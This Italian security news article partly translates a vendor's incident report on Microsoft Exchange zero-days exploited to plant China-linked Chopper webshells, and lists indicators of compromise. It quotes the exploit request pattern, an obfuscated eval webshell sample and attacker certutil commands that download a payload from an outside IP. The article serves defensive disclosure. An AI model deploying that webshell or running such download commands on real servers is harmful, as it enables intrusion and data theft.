I cybercriminali stanno sfruttando bug zero-day di Microsoft Exchange che consentono l’esecuzione di codice in modalità remota, secondo le affermazioni fatte dai ricercatori di sicurezza dell’azienda vietnamita di sicurezza informatica GTSC, che per prima ha individuato e segnalato gli attacchi.

Gli aggressori stanno concatenando la coppia di zero-day per distribuire le webshell Chopper di origine cinese su server compromessi per acquisire persistenza finalizzata al furto di dati, oltre a spostarsi lateralmente su altri sistemi sulle reti delle vittime.

Intorno all’inizio di agosto 2022, il SOC dell’azienda GTSC ha scoperto che un’infrastruttura critica veniva attaccata, in particolare sulla propria applicazione Microsoft Exchange. 

Durante l’indagine, gli esperti del Blue Team di GTSC hanno stabilito che l’attacco utilizzava una vulnerabilità di sicurezza di Exchange non pubblicata, ovvero una vulnerabilità di 0day, quindi hanno immediatamente elaborato un piano di contenimento temporaneo. 

Allo stesso tempo, gli esperti di Red Team dell’azienda hanno iniziato la ricerca e il debug del codice decompilato di Exchange per trovare la vulnerabilità e sfruttare il codice. Grazie all’esperienza sui bug precedenti di Microsoft Exchange, i tempi di ricerca si sono stati ridotti e la vulnerabilità è stata scoperta rapidamente. 

La vulnerabilità risulta essere così critica da consentire all’attaccante di eseguire RCE sul sistema compromesso. GTSC ha immediatamente presentato la vulnerabilità alla Zero Day Initiative (ZDI) per collaborare con Microsoft in modo da poter preparare una patch il prima possibile. 

ZDI ha verificato e riconosciuto 2 bug, i cui punteggi CVSS sono 8,8 e 6,3, relativi all’exploit come segue.

Tuttavia, fino ad ora, GTSC ha visto anche altri clienti riscontrare il problema. 

Dopo accurati test, è stato confermato che quei sistemi venivano attaccati utilizzando questa vulnerabilità 0day. Per aiutare la comunità a fermare temporaneamente l’attacco prima di una patch ufficiale di Microsoft, l’azienda ha pubblicato un articolo (che abbiamo parzialmente tradotto) rivolto a quelle organizzazioni che utilizzano il sistema di posta elettronica Microsoft Exchange.

Informazioni sulla vulnerabilità

Durante la fornitura del servizio SOC a un cliente di GTSC, il Blueteam ha rilevato richieste di exploit nei registri IIS con lo stesso formato della vulnerabilità di ProxyShell: 

autodiscover/[email protected]/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%[email protected]

Controllando anche altri log, i ricercatori hanno visto che l’attaccante può eseguire comandi sul sistema attaccato. Il numero di versione di questi server Exchange mostrava che l’ultimo aggiornamento era già installato, quindi lo sfruttamento non era relativo alla vulnerabilità di Proxyshell in quanto la fix era stata installata.

Attività post-exploit

Gli hacker malintenzionati hanno utilizzato varie tecniche per creare backdoor sul sistema interessato ed eseguire movimenti laterali verso altri server nel sistema.

Webshell

E’ stata rilevata una webshell, per lo più offuscate, rilasciate sui server Exchange. Utilizzando lo user-agent, è stato possibile comprendere che l’attaccante utilizza Antsword, uno strumento attivo di amministrazione di siti Web multipiattaforma opensource con sede in cinese che supporta la gestione di webshell.

<%@Page Language="Jscript"%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

SI sospetta che provengano da un gruppo di attacco cinese perché la codepage della webshell è 936, che è una codifica dei caratteri Microsoft per il cinese semplificato.

Un’altra caratteristica degna di nota è che l’hacker modifica anche il contenuto del file RedirSuiteServiceProxy.aspx in webshell. 

RedirSuiteServiceProxy.aspx è un nome file legittimo disponibile nel server Exchange.

Durante il processo di risposta agli incidenti presso un altro cliente, GTSC ha notato che il team di attacco ha utilizzato un altro modello di webshell

• Nome file : errorEE.aspx
• SHA256 : be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
• Rif : https://github.com/antonioCoco/SharPyShell

Esecuzione del comando

Oltre a raccogliere informazioni sul sistema, l’attaccante scarica i file e controlla le connessioni tramite certutil, che è uno strumento legittimo disponibile in ambiente Windows.

“cmd” /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Va notato che ogni comando termina con la stringa echo [S]&cd&echo [E] , che è una delle firme del cinese Chopper.

Inoltre, l’hacker inserisce nella memoria delle DLL dannose, rilascia file sospetti sui server attaccati ed esegue questi file tramite WMIC.

File sospetto

Sui server, sono stati rilevati file sospetti di formati exe e dll

Tra i file sospetti, in base ai comandi eseguiti sul server, è stato determinato che all.exe  e dump.dll sono responsabili del dump delle credenziali sul sistema server. 

Successivamente, l’attaccante utilizza rar.exe per comprimere i file scaricati e copiarli nella webroot del server Exchange. Sfortunatamente, durante il processo di risposta, i file di cui sopra non esistono più sul sistema compromesso, probabilmente a causa dell’eliminazione delle prove da parte dell’hacker. 

Il file cm.exe che viene rilasciato nella cartella C:\PerfLogs\ è lo strumento standard della riga di comando di Windows cmd.exe .

Indicatori di compromissione

Webshell:

File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1                Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: Xml.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1 Path: Xml.ashx

Filename: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

DLL:

File name: Dll.dll

SHA256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82			45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9			9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0			29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3			c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

File name: 180000000.dll (Dump từ tiến trình Svchost.exe)

SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP:

• 125[.]212[.]220[.]48
• 5[.]180[.]61[.]17
• 47[.]242[.]39[.]92
• 61[.]244[.]94[.]85
• 86[.]48[.]6[.]69
• 86[.]48[.]12[.]64
• 94[.]140[.]8[.]48
• 94[.]140[.]8[.]113
• 103[.]9[.]76[.]208
• 103[.]9[.]76[.]211
• 104[.]244[.]79[.]6
• 112[.]118[.]48[.]186
• 122[.]155[.]174[.]188
• 125[.]212[.]241[.]134
• 185[.]220[.]101[.]182
• 194[.]150[.]167[.]88
• 212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33

Mitre ATT&CK Mapping

Pietro Melillo

Membro e Riferimento del gruppo di Red Hot Cyber Dark Lab, è un ingegnere Informatico specializzato in Cyber Security con una profonda passione per l’Hacking e la tecnologia, attualmente CISO di WURTH Italia, è stato responsabile dei servizi di Cyber Threat Intelligence & Dark Web analysis in IBM, svolge attività di ricerca e docenza su tematiche di Cyber Threat Intelligence presso l’Università del Sannio, come Ph.D, autore di paper scientifici e sviluppo di strumenti a supporto delle attività di cybersecurity. Dirige il Team di CTI "RHC DarkLab"

Aree di competenza: Cyber Threat Intelligence, Ransomware, Sicurezza nazionale, Formazione